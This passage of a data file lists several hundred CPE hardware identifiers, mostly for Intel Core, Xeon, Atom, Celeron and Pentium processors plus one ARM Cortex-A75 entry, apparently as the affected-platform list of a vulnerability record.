"cpe:/h:intel:xeon_e3_1246_v3:-", "cpe:/h:intel:xeon_e5_2623_v3:-", "cpe:/h:intel:atom_x3:c3295rk", "cpe:/h:intel:xeon:w5590", "cpe:/h:intel:atom_c:c3955", "cpe:/h:intel:xeon:lc5528", "cpe:/h:intel:atom_c:c2730", "cpe:/h:intel:atom_c:c2518", "cpe:/h:intel:xeon_e5_2640_v2:-", "cpe:/h:intel:core_i5:6200u", "cpe:/h:intel:core_i3:6100h", "cpe:/h:intel:atom_x3:c3265rk", "cpe:/h:intel:xeon_platinum:8160m", "cpe:/h:intel:xeon_e3_1265l_v3:-", "cpe:/h:intel:core_i5:4670r", "cpe:/h:intel:core_i7:4770te", "cpe:/h:intel:xeon_gold:6126f", "cpe:/h:intel:celeron_j:j3355", "cpe:/h:intel:xeon_e7:4830_v3", "cpe:/h:intel:xeon_e5_1428l_v2:-", "cpe:/h:intel:xeon_e3:1545m_v5", "cpe:/h:intel:xeon_e5:2660_v3", "cpe:/h:intel:core_i5:4300y", "cpe:/h:intel:atom_c:c3808", "cpe:/h:intel:core_i5:3610me", "cpe:/h:intel:core_i5:4250u", "cpe:/h:intel:core_i5:3475s", "cpe:/h:intel:xeon_e5:2695_v2", "cpe:/h:intel:core_i7:3517ue", "cpe:/h:intel:xeon_e5:4650_v2", "cpe:/h:intel:core_i7:4500u", "cpe:/h:intel:core_i5:4430s", "cpe:/h:intel:core_i3:2365m", "cpe:/h:intel:core_i7:2920xm", "cpe:/h:intel:core_i3:330m", "cpe:/h:intel:xeon_e5:4640", "cpe:/h:intel:xeon_e5:2667_v3", "cpe:/h:intel:core_i7:3612qm", "cpe:/h:intel:core_i7:4900mq", "cpe:/h:intel:core_i5:4258u", "cpe:/h:intel:core_i3:4160", "cpe:/h:intel:core_i5:4590", "cpe:/h:intel:xeon_e5:2683_v4", "cpe:/h:intel:xeon_e5_2440:-", "cpe:/h:intel:core_i7:980x", "cpe:/h:intel:core_i7:5750hq", "cpe:/h:intel:xeon_e3_1505l_v6:-", "cpe:/h:intel:xeon:l3406", "cpe:/h:intel:atom_e:e3825", "cpe:/h:intel:atom_c:c3538", "cpe:/h:intel:core_i5:3470t", "cpe:/h:intel:xeon_e5_1620:-", "cpe:/h:intel:atom_c:c2738", "cpe:/h:intel:xeon_e5_2630l_v4:-", "cpe:/h:intel:xeon:e5507", "cpe:/h:intel:core_i5:2500", "cpe:/h:intel:xeon_e5:2667", "cpe:/h:intel:core_i3:3120me", "cpe:/h:intel:core_i5:4400e", "cpe:/h:intel:core_i3:8100", "cpe:/h:intel:core_i5:2450m", "cpe:/h:intel:xeon_e5:2687w_v4", "cpe:/h:intel:core_i5:2300", "cpe:/h:intel:xeon_e3:1535m_v5", "cpe:/h:intel:atom_z:z3740", "cpe:/h:intel:xeon_e5:2680_v3", "cpe:/h:intel:xeon_e7:8857_v2", "cpe:/h:intel:core_i5:4670", "cpe:/h:intel:core_i5:4300m", "cpe:/h:intel:core_i3:6167u", "cpe:/h:intel:core_i3:3220t", "cpe:/h:intel:core_i7:2617m", "cpe:/h:intel:pentium_n:n3540", "cpe:/h:intel:xeon_e5_2628l_v4:-", "cpe:/h:intel:core_i7:3540m", "cpe:/h:intel:xeon_e5_1660_v2:-", "cpe:/h:intel:xeon_gold:5120", "cpe:/h:intel:xeon_e5:4610_v3", "cpe:/h:intel:core_i5:3427u", "cpe:/h:intel:core_i7:3610qm", "cpe:/h:intel:core_m:5y10c", "cpe:/h:intel:core_i7:3770", "cpe:/h:intel:xeon_e3:1585_v5", "cpe:/h:intel:xeon_e3_1225_v6:-", "cpe:/h:intel:xeon_e3_1275_v5:-", "cpe:/h:intel:xeon_e5:2658", "cpe:/h:intel:core_i5:3450", "cpe:/h:intel:core_i7:620lm", "cpe:/h:intel:xeon_e3_1280_v2:-", "cpe:/h:intel:core_i5:5675r", "cpe:/h:intel:xeon_e5_2608l_v3:-", "cpe:/h:intel:core_m:5y10a", "cpe:/h:intel:xeon:e6540", "cpe:/h:intel:core_i7:4712hq", "cpe:/h:intel:core_i7:7560u", "cpe:/h:intel:core_i3:3229y", "cpe:/h:intel:atom_e:e3826", "cpe:/h:intel:core_i7:2610ue", "cpe:/h:intel:core_i7:975", "cpe:/h:intel:core_i5:2435m", "cpe:/h:intel:core_i3:2310m", "cpe:/h:intel:core_i5:4570", "cpe:/h:intel:core_i3:4030y", "cpe:/h:intel:core_i3:380um", "cpe:/h:intel:core_i5:4690s", "cpe:/h:intel:xeon_e5_1660:-", "cpe:/h:intel:xeon_gold:5122", "cpe:/h:intel:xeon_platinum:8170", "cpe:/h:intel:xeon_e5:2697_v4", "cpe:/h:intel:xeon:x5660", "cpe:/h:intel:core_m5:6y54", "cpe:/h:intel:xeon_e3_1220_v2:-", "cpe:/h:intel:core_i7:3612qe", "cpe:/h:intel:xeon_e5:4640_v2", "cpe:/h:intel:xeon_e5_1620_v4:-", "cpe:/h:intel:xeon_e5:4620_v4", "cpe:/h:intel:xeon_e3_1285l_v3:-", "cpe:/h:intel:core_i5:5350u", "cpe:/h:intel:xeon_e5_2450:-", "cpe:/h:intel:xeon_e5_2640_v4:-", "cpe:/h:intel:core_i3:4012y", "cpe:/h:intel:xeon_e3_1271_v3:-", "cpe:/h:intel:xeon_e5:4610_v4", "cpe:/h:intel:core_i7:4700mq", "cpe:/h:intel:xeon_e7:8870_v3", "cpe:/h:intel:xeon_e5_2430l_v2:-", "cpe:/h:intel:xeon_e5:2660_v2", "cpe:/h:intel:core_i5:3437u", "cpe:/h:intel:core_i7:4870hq", "cpe:/h:intel:xeon_gold:6134m", "cpe:/h:intel:atom_z:z3460", "cpe:/h:intel:core_i7:7700", "cpe:/h:intel:core_i3:2328m", "cpe:/h:intel:xeon_e5_2430:-", "cpe:/h:intel:core_i7:2670qm", "cpe:/h:intel:xeon_e5:2687w_v3", "cpe:/h:intel:atom_c:c3750", "cpe:/h:intel:xeon_phi:7235", "cpe:/h:intel:atom_z:z2580", "cpe:/h:intel:xeon_e7:4820", "cpe:/h:intel:xeon_e5:2680_v4", "cpe:/h:intel:core_i5:680", "cpe:/h:intel:xeon_e5_2643:-", "cpe:/h:intel:celeron_j:j1900", "cpe:/h:intel:xeon_gold:6130", "cpe:/h:intel:core_i5:2537m", "cpe:/h:intel:xeon_silver:4114t", "cpe:/h:intel:xeon_e7:8850_v2", "cpe:/h:intel:xeon_silver:4108", "cpe:/h:intel:xeon_e5_1650_v3:-", "cpe:/h:intel:celeron_j:j3160", "cpe:/h:intel:core_i7:3632qm", "cpe:/h:intel:xeon_e3:1535m_v6", "cpe:/h:intel:celeron_j:j3455", "cpe:/h:intel:core_i3:2100t", "cpe:/h:intel:xeon_silver:4112", "cpe:/h:intel:core_i7:4770", "cpe:/h:intel:xeon_e3_1281_v3:-", "cpe:/h:intel:xeon_e3_1280_v3:-", "cpe:/h:intel:core_i3:4100m", "cpe:/h:intel:celeron_n:n3450", "cpe:/h:intel:xeon_e7:2820", "cpe:/h:intel:core_i3:4370t", "cpe:/h:intel:core_i3:4150", "cpe:/h:intel:xeon_e7:8880l_v2", "cpe:/h:intel:xeon_e3_1225_v5:-", "cpe:/h:intel:xeon_e5:2697a_v4", "cpe:/h:intel:core_i3:6100e", "cpe:/h:intel:xeon_e5_2618l_v2:-", "cpe:/h:intel:xeon_e5:4657l_v2", "cpe:/h:intel:core_i5:470um", "cpe:/h:intel:xeon_e5_2630_v3:-", "cpe:/h:intel:xeon_e7:8890_v4", "cpe:/h:intel:atom_z:z3795", "cpe:/h:intel:core_i5:4220y", "cpe:/h:intel:xeon_e5_2428l:-", "cpe:/h:intel:core_i3:4102e", "cpe:/h:intel:core_i3:2370m", "cpe:/h:intel:xeon_phi:7250", "cpe:/h:intel:xeon_gold:6130t", "cpe:/h:intel:core_i7:4960hq", "cpe:/h:intel:celeron_n:n3150", "cpe:/h:intel:xeon_e5:2698_v4", "cpe:/h:intel:core_i7:860", "cpe:/h:intel:core_i3:2375m", "cpe:/h:intel:core_i3:4158u", "cpe:/h:intel:atom_z:z2420", "cpe:/h:intel:xeon:x5687", "cpe:/h:intel:core_i7:4710mq", "cpe:/h:intel:core_i5:4460s", "cpe:/h:intel:xeon_e3:1585l_v5", "cpe:/h:intel:xeon:l5618", "cpe:/h:intel:xeon_e5_2650l:-", "cpe:/h:intel:xeon:e5640", "cpe:/h:intel:core_i7:4702mq", "cpe:/h:intel:xeon_gold:6128", "cpe:/h:intel:core_i7:4771", "cpe:/h:intel:core_i7:5850eq", "cpe:/h:intel:xeon_e3_1276_v3:-", "cpe:/h:intel:xeon:l7555", "cpe:/h:intel:core_i3:390m", "cpe:/h:intel:xeon_e7:4850", "cpe:/h:intel:core_m3:7y30", "cpe:/h:intel:xeon_e7:8850", "cpe:/h:intel:xeon:e5502", "cpe:/h:intel:core_i3:4170t", "cpe:/h:intel:xeon_e5_2620_v4:-", "cpe:/h:intel:xeon_e5:4660_v3", "cpe:/h:intel:core_i5:4340m", "cpe:/h:intel:core_i5:6300hq", "cpe:/h:intel:celeron_n:n3000", "cpe:/h:intel:core_i3:5010u", "cpe:/h:intel:core_i5:4278u", "cpe:/h:intel:core_i7:4722hq", "cpe:/h:intel:core_i5:6500te", "cpe:/h:intel:core_i7:3770t", "cpe:/h:intel:xeon_e7:8891_v2", "cpe:/h:intel:xeon_e5:4660_v4", "cpe:/h:intel:core_i5:4440", "cpe:/h:intel:core_i5:5257u", "cpe:/h:intel:core_i7:4600m", "cpe:/h:intel:xeon_e7:4860", "cpe:/h:intel:core_i5:3570", "cpe:/h:intel:xeon_e5_2630:-", "cpe:/h:intel:core_i7:620m", "cpe:/h:intel:core_i5:3230m", "cpe:/h:intel:xeon_e5_2440_v2:-", "cpe:/h:intel:xeon_e3_12201_v2:-", "cpe:/h:intel:xeon_e3_1270_v3:-", "cpe:/h:intel:core_i7:7820hq", "cpe:/h:intel:xeon_e3_1231_v3:-", "cpe:/h:intel:core_i7:880", "cpe:/h:intel:xeon:e5645", "cpe:/h:intel:xeon:e5649", "cpe:/h:intel:xeon_gold:6148", "cpe:/h:intel:xeon_e7:8880_v2", "cpe:/h:intel:xeon_e5:4610", "cpe:/h:intel:xeon_gold:6146", "cpe:/h:intel:xeon_e3_1275:-", "cpe:/h:intel:xeon_e5_2630l_v3:-", "cpe:/h:intel:xeon_e5_1660_v4:-", "cpe:/h:intel:core_i5:4690", "cpe:/h:intel:core_i7:4510u", "cpe:/h:intel:core_i3:2130", "cpe:/h:intel:core_i5:6350hq", "cpe:/h:intel:xeon_e5_2630l_v2:-", "cpe:/h:intel:core_i5:4690t", "cpe:/h:intel:xeon:e6510", "cpe:/h:intel:xeon_gold:6142f", "cpe:/h:intel:xeon:l5508", "cpe:/h:intel:core_i7:4720hq", "cpe:/h:intel:xeon_e7:4880_v2", "cpe:/h:intel:core_i3:4160t", "cpe:/h:intel:core_i5:2500k", "cpe:/h:intel:core_i5:520m", "cpe:/h:intel:celeron_n:n2820", "cpe:/h:intel:xeon_e5_2628l_v3:-", "cpe:/h:intel:atom_c:c2530", "cpe:/h:intel:core_i3:2120t", "cpe:/h:intel:atom_c:c2750", "cpe:/h:intel:core_i5:6600", "cpe:/h:intel:xeon_e3_1501m_v6:-", "cpe:/h:intel:core_i5:2500t", "cpe:/h:intel:xeon_e5:4620_v2", "cpe:/h:intel:xeon_e7:4870_v2", "cpe:/h:intel:core_i7:3840qm", "cpe:/h:intel:core_i3:560", "cpe:/h:intel:atom_c:c2350", "cpe:/h:intel:core_i7:3770k", "cpe:/h:intel:core_i7:5950hq", "cpe:/h:intel:pentium_j:j4205", "cpe:/h:intel:xeon_e3:1505m_v6", "cpe:/h:intel:xeon_e3_1235:-", "cpe:/h:intel:core_i5:2320", "cpe:/h:intel:xeon_e7:4890_v2", "cpe:/h:intel:core_i5:2515e", "cpe:/h:intel:core_i7:950", "cpe:/h:intel:core_i3:4120u", "cpe:/h:intel:core_i5:540um", "cpe:/h:intel:xeon_e7:8870_v4", "cpe:/h:intel:core_i5:4330m", "cpe:/h:intel:core_i5:5350h", "cpe:/h:intel:xeon_e3_1240:-", "cpe:/h:intel:xeon_e3_1230_v3:-", "cpe:/h:intel:xeon:e5540", "cpe:/h:intel:core_i5:6685r", "cpe:/h:intel:atom_z:z3735f", "cpe:/h:intel:core_i7:7820hk", "cpe:/h:intel:core_i3:2312m", "cpe:/h:intel:core_i5:2557m", "cpe:/h:intel:core_i7:4790k", "cpe:/h:intel:core_i5:4200h", "cpe:/h:intel:core_i5:3340s", "cpe:/h:intel:core_i3:3130m", "cpe:/h:intel:core_i7:8650u", "cpe:/h:intel:core_i3:5015u", "cpe:/h:intel:core_i5:2540m", "cpe:/h:intel:atom_x3:c3205rk", "cpe:/h:intel:core_i7:4790s", "cpe:/h:intel:xeon_e3_1275_v6:-", "cpe:/h:intel:core_i5:6400", "cpe:/h:intel:atom_c:c3830", "cpe:/h:intel:core_i5:2390t", "cpe:/h:intel:core_i3:3220", "cpe:/h:intel:xeon:w3690", "cpe:/h:intel:xeon_e5_2420_v2:-", "cpe:/h:intel:xeon_e3_1268l_v5:-", "cpe:/h:intel:xeon_e3_1270_v6:-", "cpe:/h:intel:xeon:x3430", "cpe:/h:intel:xeon_e5_2609_v4:-", "cpe:/h:intel:core_i5:580m", "cpe:/h:intel:core_i7:5550u", "cpe:/h:intel:core_i5:3320m", "cpe:/h:intel:atom_x3:c3405", "cpe:/h:intel:core_i3:4025u", "cpe:/h:intel:core_i3:4010y", "cpe:/h:intel:core_i3:2330m", "cpe:/h:intel:xeon_platinum:8164", "cpe:/h:intel:xeon_e7:2803", "cpe:/h:intel:core_i5:660", "cpe:/h:intel:core_i5:6440eq", "cpe:/h:intel:core_i5:5200u", "cpe:/h:intel:xeon_platinum:8156", "cpe:/h:intel:xeon_e5_2620:-", "cpe:/h:intel:xeon_e5_2648l:-", "cpe:/h:intel:core_i7:2860qm", "cpe:/h:intel:core_i7:3615qe", "cpe:/h:intel:core_i5:6500", "cpe:/h:intel:core_i5:2430m", "cpe:/h:intel:atom_e:e3805", "cpe:/h:intel:xeon_e3_1245_v5:-", "cpe:/h:intel:core_i5:3330s", "cpe:/h:intel:xeon_e3_1270_v5:-", "cpe:/h:intel:core_i3:8350k", "cpe:/h:intel:xeon_platinum:8168", "cpe:/h:intel:xeon:x5560", "cpe:/h:intel:core_i7:4578u", "cpe:/h:intel:xeon_gold:6126", "cpe:/h:intel:core_i3:4150t", "cpe:/h:intel:core_i3:3225", "cpe:/h:intel:xeon_e7:2850", "cpe:/h:intel:xeon_e3_1290_v2:-", "cpe:/h:intel:core_i7:2715qe", "cpe:/h:intel:core_i3:6300", "cpe:/h:intel:xeon_e7:2850_v2", "cpe:/h:intel:xeon_e5_2448l_v2:-", "cpe:/h:intel:xeon_gold:6140m", "cpe:/h:intel:core_i5:760", "cpe:/h:intel:xeon_e5_2470:-", "cpe:/h:intel:xeon:e5606", "cpe:/h:intel:celeron_j:j3060", "cpe:/h:intel:atom_c:c3708", "cpe:/h:intel:xeon_e5_2640_v3:-", "cpe:/h:intel:celeron_n:n3160", "cpe:/h:intel:xeon:x5680", "cpe:/h:intel:celeron_n:n2807", "cpe:/h:intel:xeon_e5_2650_v2:-", "cpe:/h:intel:xeon:l5630", "cpe:/h:intel:xeon_e5:2687w_v2", "cpe:/h:intel:core_i5:3439y", "cpe:/h:intel:core_i5:540m", "cpe:/h:intel:xeon_e7:8860_v4", "cpe:/h:intel:core_i7:640um", "cpe:/h:intel:xeon_gold:6142m", "cpe:/h:intel:core_m3:7y32", "cpe:/h:intel:atom_z:z3745d", "cpe:/h:intel:atom_c:c3958", "cpe:/h:intel:core_i7:3555le", "cpe:/h:intel:core_i7:2655le", "cpe:/h:intel:core_i3:3217u", "cpe:/h:intel:xeon_e7:4850_v4", "cpe:/h:intel:core_i3:6100u", "cpe:/h:intel:pentium_n:n4200", "cpe:/h:intel:core_m7:6y75", "cpe:/h:intel:core_i7:940", "cpe:/h:intel:celeron_n:n3010", "cpe:/h:intel:xeon:x5675", "cpe:/h:intel:xeon_e5_1630_v3:-", "cpe:/h:intel:xeon_gold:6138f", "cpe:/h:intel:core_i5:6600t", "cpe:/h:intel:xeon_e3_1285_v4:-", "cpe:/h:intel:core_i7:640lm", "cpe:/h:intel:core_i3:5005u", "cpe:/h:intel:core_i5:2467m", "cpe:/h:intel:core_i5:4308u", "cpe:/h:intel:core_i7:660ue", "cpe:/h:intel:core_i5:3380m", "cpe:/h:intel:xeon_e5_2609_v2:-", "cpe:/h:intel:xeon_e5_2648l_v2:-", "cpe:/h:intel:xeon_e7:8880_v3", "cpe:/h:intel:atom_x3:c3130", "cpe:/h:intel:xeon_e7:8837", "cpe:/h:intel:core_i7:980", "cpe:/h:intel:xeon_e5_2407:-", "cpe:/h:intel:xeon:e7530", "cpe:/h:intel:xeon:x3460", "cpe:/h:intel:xeon_e7:8870_v2", "cpe:/h:intel:core_i5:4210h", "cpe:/h:intel:core_i7:990x", "cpe:/h:intel:core_i7:660lm", "cpe:/h:intel:core_i5:2380p", "cpe:/h:intel:core_i7:7500u", "cpe:/h:intel:core_i5:4570t", "cpe:/h:intel:core_i3:4020y", "cpe:/h:intel:core_i3:330um", "cpe:/h:intel:core_i5:4360u", "cpe:/h:intel:xeon_e5:2658_v3", "cpe:/h:intel:core_i5:3360m", "cpe:/h:intel:atom_z:z3740d", "cpe:/h:intel:xeon_phi:7290", "cpe:/h:intel:xeon_gold:5120t", "cpe:/h:intel:xeon_e3_1260l:-", "cpe:/h:intel:xeon_e3:1515m_v5", "cpe:/h:intel:xeon_e5_2620_v3:-", "cpe:/h:intel:xeon_e5_2650_v3:-", "cpe:/h:intel:core_i3:6320", "cpe:/h:intel:core_i7:3689y", "cpe:/h:intel:pentium_j:j2900", "cpe:/h:intel:core_i7:4600u", "cpe:/h:intel:xeon_e5:4667_v4", "cpe:/h:intel:core_i7:820qm", "cpe:/h:intel:xeon_e5_2637_v2:-", "cpe:/h:intel:xeon_e5_2603_v2:-", "cpe:/h:intel:xeon_e5_2637_v3:-", "cpe:/h:intel:xeon:e7540", "cpe:/h:intel:xeon:e5530", "cpe:/h:intel:core_i3:3250", "cpe:/h:intel:core_i3:4360t", "cpe:/h:intel:xeon_e5:4617", "cpe:/h:intel:core_i5:4350u", "cpe:/h:intel:core_i7:4790t", "cpe:/h:intel:xeon_e5_2603_v3:-", "cpe:/h:intel:core_i3:4112e", "cpe:/h:intel:core_i5:460m", "cpe:/h:intel:xeon_e3_1270_v2:-", "cpe:/h:intel:xeon_e7:8830", "cpe:/h:intel:xeon_e5_2403:-", "cpe:/h:intel:core_i7:3635qm", "cpe:/h:intel:xeon_e5_2428l_v2:-", "cpe:/h:intel:xeon_e3_1226_v3:-", "cpe:/h:intel:xeon_e7:8867_v3", "cpe:/h:intel:xeon_e7:4830", "cpe:/h:intel:xeon_e5:4603", "cpe:/h:intel:atom_c:c3308", "cpe:/h:intel:xeon_e3_1286l_v3:-", "cpe:/h:intel:xeon_e3_1280:-", "cpe:/h:intel:xeon_e5:2683_v3", "cpe:/h:intel:xeon_e7:8880_v4", "cpe:/h:intel:core_i7:4558u", "cpe:/h:intel:core_i5:4690k", "cpe:/h:intel:core_i5:2410m", "cpe:/h:intel:core_i7:740qm", "cpe:/h:intel:core_i5:6500t", "cpe:/h:intel:xeon_e5:2658_v2", "cpe:/h:intel:xeon_gold:6134", "cpe:/h:intel:core_i5:3350p", "cpe:/h:intel:xeon_e7:8890_v2", "cpe:/h:intel:celeron_j:j1750", "cpe:/h:intel:xeon_e5_1650_v4:-", "cpe:/h:intel:celeron_j:j4005", "cpe:/h:intel:core_i3:3110m", "cpe:/h:intel:xeon_e3_1240_v6:-", "cpe:/h:intel:core_i7:920xm", "cpe:/h:intel:core_i5:4402e", "cpe:/h:intel:core_i3:4340te", "cpe:/h:intel:core_i7:4770s", "cpe:/h:intel:celeron_n:n2805", "cpe:/h:intel:celeron_n:n3060", "cpe:/h:intel:xeon_e7:4820_v3", "cpe:/h:intel:xeon_e3_1240l_v3:-", "cpe:/h:intel:core_i3:3120m", "cpe:/h:intel:core_i7:4950hq", "cpe:/h:intel:core_i5:8350u", "cpe:/h:intel:xeon_e5:2699a_v4", "cpe:/h:intel:xeon_e3_1505l_v5:-", "cpe:/h:intel:xeon_e3_1225_v2:-", "cpe:/h:intel:xeon_platinum:8176m", "cpe:/h:intel:xeon:l7545", "cpe:/h:intel:core_i7:620um", "cpe:/h:intel:xeon_e3_1240_v3:-", "cpe:/h:intel:xeon_e3:1558l_v5", "cpe:/h:intel:xeon_e5_2418l:-", "cpe:/h:intel:xeon_e3_1290:-", "cpe:/h:intel:xeon_e5_2603_v4:-", "cpe:/h:intel:xeon_e3_1240_v5:-", "cpe:/h:intel:xeon:w3670", "cpe:/h:intel:core_i7:5700eq", "cpe:/h:intel:core_i7:940xm", "cpe:/h:intel:xeon_phi:7210f", "cpe:/h:intel:xeon:x7560", "cpe:/h:intel:core_i7:5775r", "cpe:/h:intel:pentium_n:n3530", "cpe:/h:intel:core_i3:3217ue", "cpe:/h:intel:xeon_e5:4627_v2", "cpe:/h:intel:xeon_e5_2403_v2:-", "cpe:/h:intel:xeon_e3_1230_v2:-", "cpe:/h:intel:xeon:e5620", "cpe:/h:intel:core_i7:3770s", "cpe:/h:intel:core_i3:3210", "cpe:/h:intel:core_i7:2635qm", "cpe:/h:intel:core_i7:660um", "cpe:/h:intel:xeon_e5:2658_v4", "cpe:/h:intel:core_i7:2710qe", "cpe:/h:intel:xeon_e5_2643_v2:-", "cpe:/h:intel:core_i5:2400", "cpe:/h:intel:core_m5:6y57", "cpe:/h:intel:xeon_e5:2650l_v4", "cpe:/h:intel:core_i5:3570s", "cpe:/h:intel:core_i7:7820eq", "cpe:/h:intel:celeron_n:n2830", "cpe:/h:intel:atom_c:c2316", "cpe:/h:intel:core_i7:4610y", "cpe:/h:intel:xeon_e5:2697_v3", "cpe:/h:intel:core_i3:3245", "cpe:/h:intel:core_i3:4130t", "cpe:/h:intel:xeon_e7:8891_v4", "cpe:/h:intel:xeon_e5_2650:-", "cpe:/h:intel:xeon_e3_1260l_v5:-", "cpe:/h:intel:xeon_e3_1275l_v3:-", "cpe:/h:intel:core_i5:2520m", "cpe:/h:intel:xeon_e5:2660", "cpe:/h:intel:xeon:x7542", "cpe:/h:intel:celeron_n:n2930", "cpe:/h:intel:core_i7:860s", "cpe:/h:intel:core_i5:6267u", "cpe:/h:intel:atom_z:z3560", "cpe:/h:intel:core_i5:6402p", "cpe:/h:intel:xeon_e3_1220:-", "cpe:/h:intel:xeon:x5677", "cpe:/h:intel:xeon:l5638", "cpe:/h:intel:xeon_e7:8867l", "cpe:/h:intel:atom_c:c3758", "cpe:/h:intel:xeon:x5672", "cpe:/h:intel:core_i5:4460", "cpe:/h:intel:celeron_n:n2840", "cpe:/h:intel:pentium_n:n3510", "cpe:/h:intel:xeon_e7:8880l_v3", "cpe:/h:intel:xeon_gold:6132", "cpe:/h:intel:xeon_e5_2420:-", "cpe:/h:intel:xeon_e5:4627_v4", "cpe:/h:intel:xeon_e7:2830", "cpe:/h:intel:core_i7:620ue", "cpe:/h:intel:core_i7:3517u", "cpe:/h:intel:xeon_e3_1105c_v2:-", "cpe:/h:intel:core_i3:4110m", "cpe:/h:intel:core_i5:4430", "cpe:/h:intel:celeron_j:j4105", "cpe:/h:intel:atom_c:c3508", "cpe:/h:intel:xeon_e5_2450l:-", "cpe:/h:intel:core_i5:430m", "cpe:/h:intel:celeron_j:j1800", "cpe:/h:intel:core_i5:5287u", "cpe:/h:intel:xeon_e5_2430l:-", "cpe:/h:intel:core_i5:5300u", "cpe:/h:intel:xeon_e5_2630l:-", "cpe:/h:intel:xeon_e5_2630_v4:-", "cpe:/h:intel:atom_z:z3580", "cpe:/h:intel:core_i3:2115c", "cpe:/h:intel:core_i3:4110e", "cpe:/h:intel:core_i3:4005u", "cpe:/h:intel:core_i5:430um", "cpe:/h:intel:xeon:x5650", "cpe:/h:intel:xeon_e5:4667_v3", "cpe:/h:intel:xeon:x3470", "cpe:/h:intel:xeon_e3_1285_v6:-", "cpe:/h:intel:core_i7:640m", "cpe:/h:intel:xeon:e5503", "cpe:/h:intel:core_i7:965", "cpe:/h:intel:atom_z:z3770d", "cpe:/h:intel:atom_z:z2560", "cpe:/h:intel:xeon:x5667", "cpe:/h:intel:core_i5:3317u", "cpe:/h:intel:xeon:x5570", "cpe:/h:intel:xeon_gold:6152", "cpe:/h:intel:core_i3:5157u", "cpe:/h:intel:core_i7:2600", "cpe:/h:intel:core_i5:3470", "cpe:/h:intel:xeon_e5:4650l", "cpe:/h:intel:core_i5:8400", "cpe:/h:intel:xeon_e5:2690_v4", "cpe:/h:intel:xeon_e3_1230_v5:-", "cpe:/h:intel:xeon_e7:8894_v4", "cpe:/h:intel:core_i3:4340", "cpe:/h:intel:core_i5:4200m", "cpe:/h:intel:core_i5:4570r", "cpe:/h:intel:xeon_e7:4820_v2", "cpe:/h:intel:core_i7:970", "cpe:/h:intel:atom_x3:c3445", "cpe:/h:intel:core_m3:6y30", "cpe:/h:intel:xeon_e7:4860_v2", "cpe:/h:intel:atom_c:c2308", "cpe:/h:intel:core_i5:3470s", "cpe:/h:intel:xeon_e5:2680_v2", "cpe:/h:intel:xeon_gold:6130f", "cpe:/h:intel:xeon_e5:4624l_v2", "cpe:/h:intel:core_i5:6287u", "cpe:/h:intel:xeon_e7:4830_v2", "cpe:/h:intel:core_i7:5650u", "cpe:/h:intel:xeon:l5506", "cpe:/h:intel:atom_c:c2558", "cpe:/h:intel:xeon:e5603", "cpe:/h:intel:core_i3:540", "cpe:/h:intel:atom_c:c2718", "cpe:/h:intel:xeon_gold:5118", "cpe:/h:intel:xeon_e5:4655_v3", "cpe:/h:intel:xeon_e5_1650:-", "cpe:/h:intel:core_i7:2640m", "cpe:/h:intel:core_i3:4100u", "cpe:/h:intel:xeon_gold:6142", "cpe:/h:intel:core_i7:4702hq", "cpe:/h:intel:xeon_e5:2667_v2", "cpe:/h:intel:core_i7:2677m", "cpe:/h:intel:core_i5:4590t", "cpe:/h:intel:xeon:e5504", "cpe:/h:intel:core_i5:3570t", "cpe:/h:intel:core_i5:4670t", "cpe:/h:intel:core_i3:4000m", "cpe:/h:intel:xeon:l5518", "cpe:/h:intel:xeon_e5:4627_v3", "cpe:/h:intel:xeon_e5:4610_v2", "cpe:/h:intel:atom_z:z3480", "cpe:/h:intel:core_i7:4850hq", "cpe:/h:intel:core_i7:4810mq", "cpe:/h:intel:atom_z:z3590", "cpe:/h:intel:core_i7:4860hq", "cpe:/h:intel:core_i7:8700k", "cpe:/h:intel:core_i3:3250t", "cpe:/h:intel:xeon_e7:2880_v2", "cpe:/h:intel:core_i7:3630qm", "cpe:/h:intel:celeron_n:n2940", "cpe:/h:intel:xeon:ec5549", "cpe:/h:intel:xeon_e5_2428l_v3:-", "cpe:/h:intel:core_m:5y70", "cpe:/h:intel:xeon_e7:8893_v2", "cpe:/h:intel:atom_z:z3775d", "cpe:/h:intel:xeon_e3_1220l_v3:-", "cpe:/h:intel:core_i5:2400s", "cpe:/h:intel:xeon_e5:4640_v3", "cpe:/h:intel:xeon_platinum:8160", "cpe:/h:intel:core_i5:5250u", "cpe:/h:intel:xeon:x5670", "cpe:/h:intel:core_i3:4170", "cpe:/h:intel:xeon_gold:6154", "cpe:/h:intel:xeon_e3_1235l_v5:-", "cpe:/h:intel:core_i3:5020u", "cpe:/h:intel:xeon_e7:4830_v4", "cpe:/h:intel:atom_z:z3745", "cpe:/h:intel:core_i5:6585r", "cpe:/h:intel:xeon_bronze_3104:-", "cpe:/h:intel:core_i3:4360", "cpe:/h:intel:xeon_e7:4870", "cpe:/h:intel:xeon_platinum:8153", "cpe:/h:arm:cortex-a:75", "cpe:/h:intel:core_i7:2600k", "cpe:/h:intel:core_i3:3240", "cpe:/h:intel:core_i5:3340", "cpe:/h:intel:xeon_e5_2438l_v3:-", "cpe:/h:intel:core_i5:520um", "cpe:/h:intel:xeon_e3_1225:-", "cpe:/h:intel:pentium_n:n3710", "cpe:/h:intel:xeon_e7:2870", "cpe:/h:intel:xeon_e3_1230_v6:-", "cpe:/h:intel:core_i5:3450s", "cpe:/h:intel:xeon_e5_2643_v4:-", "cpe:/h:intel:core_i5:750", "cpe:/h:intel:xeon_e5_2637_v4:-", "cpe:/h:intel:core_i5:6360u", "cpe:/h:intel:core_i7:720qm", "cpe:/h:intel:xeon_e3_1230:-", "cpe:/h:intel:xeon_platinum:8170m", "cpe:/h:intel:core_i5:3340m", "cpe:/h:intel:xeon_e5:4628l_v4", "cpe:/h:intel:xeon_e5:4620_v3", "cpe:/h:intel:atom_c:c2538", "cpe:/h:intel:xeon_e7:8891_v3", "cpe:/h:intel:xeon_e5_2450_v2:-", "cpe:/h:intel:xeon_e5_1620_v3:-", "cpe:/h:intel:core_i5:4440s", "cpe:/h:intel:atom_z:z2480", "cpe:/h:intel:xeon_e3_1286_v3:-", "cpe:/h:intel:core_i7:4770t", "cpe:/h:intel:xeon_phi:7295", "cpe:/h:intel:xeon_e5_1620_v2:-", "cpe:/h:intel:xeon_e7:4850_v3", "cpe:/h:intel:atom_e:e3827", "cpe:/h:intel:xeon_platinum:8160f", "cpe:/h:intel:core_i5:6300u", "cpe:/h:intel:core_i5:6440hq", "cpe:/h:intel:xeon:x7550", "cpe:/h:intel:core_i7:5600u", "cpe:/h:intel:xeon_e7:2870_v2", "cpe:/h:intel:core_i7:4770k", "cpe:/h:intel:core_i3:6100te", "cpe:/h:intel:xeon_e7:4820_v4", "cpe:/h:intel:xeon_e5:2697_v2", 